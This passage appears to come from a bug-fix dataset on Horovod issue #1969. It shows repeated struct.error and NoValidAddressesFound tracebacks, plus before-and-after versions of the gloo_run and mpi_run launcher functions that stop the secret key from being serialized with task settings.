File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def gloo_run(settings, nics, driver, env):
    """
    Run distributed gloo jobs.
    :param settings: Settings for running the distributed jobs.
                     Note: settings.num_proc and settings.hosts must not be None.
    :param nics: Interfaces to use by gloo.
    :param driver: The Spark driver service that tasks are connected to.
    :param env: Environment dictionary to use for running gloo jobs. Can be None.
    """
    if env is None:
        env = {}
    # we don't want the key to be serialized along with settings from here on
    key = settings.key
    settings.key = None
    # Each thread will use SparkTaskClient to launch the job on each remote host.
    # If an error occurs in one thread, the entire process will be terminated;
    # otherwise, threads will keep running, each bound to its ssh session.
    iface = list(nics)[0]
    server_ip = driver.addresses()[iface][0][0]
    command = (
        sys.executable,
        "-m",
        "horovod.spark.task.gloo_exec_fn",
        codec.dumps_base64(driver.addresses()),
        codec.dumps_base64(settings),
    )
    exec_command = _exec_command_fn(driver.addresses(), key, settings, env)
    launch_gloo(command, exec_command, settings, nics, {}, server_ip)
|
def gloo_run(settings, nics, driver, env):
    """
    Run distributed gloo jobs.
    :param settings: Settings for running the distributed jobs.
                     Note: settings.num_proc and settings.hosts must not be None.
    :param nics: Interfaces to use by gloo.
    :param driver: The Spark driver service that tasks are connected to.
    :param env: Environment dictionary to use for running gloo jobs. Can be None.
    """
    if env is None:
        env = {}
    # Each thread will use SparkTaskClient to launch the job on each remote host.
    # If an error occurs in one thread, the entire process will be terminated;
    # otherwise, threads will keep running, each bound to its ssh session.
    iface = list(nics)[0]
    server_ip = driver.addresses()[iface][0][0]
    command = (
        sys.executable,
        "-m",
        "horovod.spark.task.gloo_exec_fn",
        codec.dumps_base64(driver.addresses()),
        codec.dumps_base64(settings),
    )
    exec_command = _exec_command_fn(driver.addresses(), settings.key, settings, env)
    launch_gloo(command, exec_command, settings, nics, {}, server_ip)
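The only functional change between the two versions is that the merged gloo_run detaches settings.key before settings is pickled into the task command, handing the key to _exec_command_fn separately so the secret never appears inside the serialized settings. A minimal sketch of that detach-then-serialize pattern; serialize_without_secret is a hypothetical helper, assuming settings exposes a mutable key attribute:

import base64
import pickle

def serialize_without_secret(settings):
    # Detach the secret so it is not pickled along with the settings,
    # mirroring the key handling in the merged gloo_run above.
    key, settings.key = settings.key, None
    payload = base64.b64encode(pickle.dumps(settings)).decode("ascii")
    return key, payload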
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def mpi_run(settings, nics, driver, env, stdout=None, stderr=None):
    """
    Runs mpirun.
    :param settings: Settings for running MPI.
                     Note: settings.num_proc and settings.hosts must not be None.
    :param nics: Interfaces to include by MPI.
    :param driver: The Spark driver service that tasks are connected to.
    :param env: Environment dictionary to use for running MPI. Can be None.
    :param stdout: Stdout of the mpi process.
                   Only used when settings.run_func_mode is True.
    :param stderr: Stderr of the mpi process.
                   Only used when settings.run_func_mode is True.
    """
    env = (
        {} if env is None else copy.copy(env)
    )  # copy env so we do not leak env modifications
    # Pass secret key through the environment variables.
    env[secret.HOROVOD_SECRET_KEY] = codec.dumps_base64(settings.key)
    # we don't want the key to be serialized along with settings from here on
    settings.key = None
    rsh_agent = (
        sys.executable,
        "-m",
        "horovod.spark.driver.mpirun_rsh",
        codec.dumps_base64(driver.addresses()),
        codec.dumps_base64(settings),
    )
    settings.extra_mpi_args = (
        '{extra_mpi_args} -x NCCL_DEBUG=INFO -mca plm_rsh_agent "{rsh_agent}"'.format(
            extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else "",
            rsh_agent=" ".join(rsh_agent),
        )
    )
    command = (
        sys.executable,
        "-m",
        "horovod.spark.task.mpirun_exec_fn",
        codec.dumps_base64(driver.addresses()),
        codec.dumps_base64(settings),
    )
    hr_mpi_run(settings, nics, env, command, stdout=stdout, stderr=stderr)
|
def mpi_run(settings, nics, driver, env, stdout=None, stderr=None):
    """
    Runs mpirun.
    :param settings: Settings for running MPI.
                     Note: settings.num_proc and settings.hosts must not be None.
    :param nics: Interfaces to include by MPI.
    :param driver: The Spark driver service that tasks are connected to.
    :param env: Environment dictionary to use for running MPI. Can be None.
    :param stdout: Stdout of the mpi process.
                   Only used when settings.run_func_mode is True.
    :param stderr: Stderr of the mpi process.
                   Only used when settings.run_func_mode is True.
    """
    env = (
        {} if env is None else copy.copy(env)
    )  # copy env so we do not leak env modifications
    # Pass secret key through the environment variables.
    env[secret.HOROVOD_SECRET_KEY] = codec.dumps_base64(settings.key)
    rsh_agent = (
        sys.executable,
        "-m",
        "horovod.spark.driver.mpirun_rsh",
        codec.dumps_base64(driver.addresses()),
        codec.dumps_base64(settings),
    )
    settings.extra_mpi_args = (
        '{extra_mpi_args} -x NCCL_DEBUG=INFO -mca plm_rsh_agent "{rsh_agent}"'.format(
            extra_mpi_args=settings.extra_mpi_args if settings.extra_mpi_args else "",
            rsh_agent=" ".join(rsh_agent),
        )
    )
    command = (
        sys.executable,
        "-m",
        "horovod.spark.task.mpirun_exec_fn",
        codec.dumps_base64(driver.addresses()),
        codec.dumps_base64(settings),
    )
    hr_mpi_run(settings, nics, env, command, stdout=stdout, stderr=stderr)
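Here the merged mpi_run adds a single line, settings.key = None, after exporting the key via HOROVOD_SECRET_KEY, so the pickled settings embedded in the rsh agent and task commands no longer carry the secret; only the environment does. A minimal illustration of passing a secret to a child process through its environment rather than its command line; launch_with_secret and CHILD_SECRET are illustrative names, not Horovod APIs:

import base64
import os
import subprocess
import sys

def launch_with_secret(secret_bytes, module, *args):
    # Hand the secret to the child via the environment so it never shows
    # up in the command line or in serialized arguments.
    env = dict(os.environ)
    env["CHILD_SECRET"] = base64.b64encode(secret_bytes).decode("ascii")
    return subprocess.run([sys.executable, "-m", module, *args], env=env, check=False)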
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
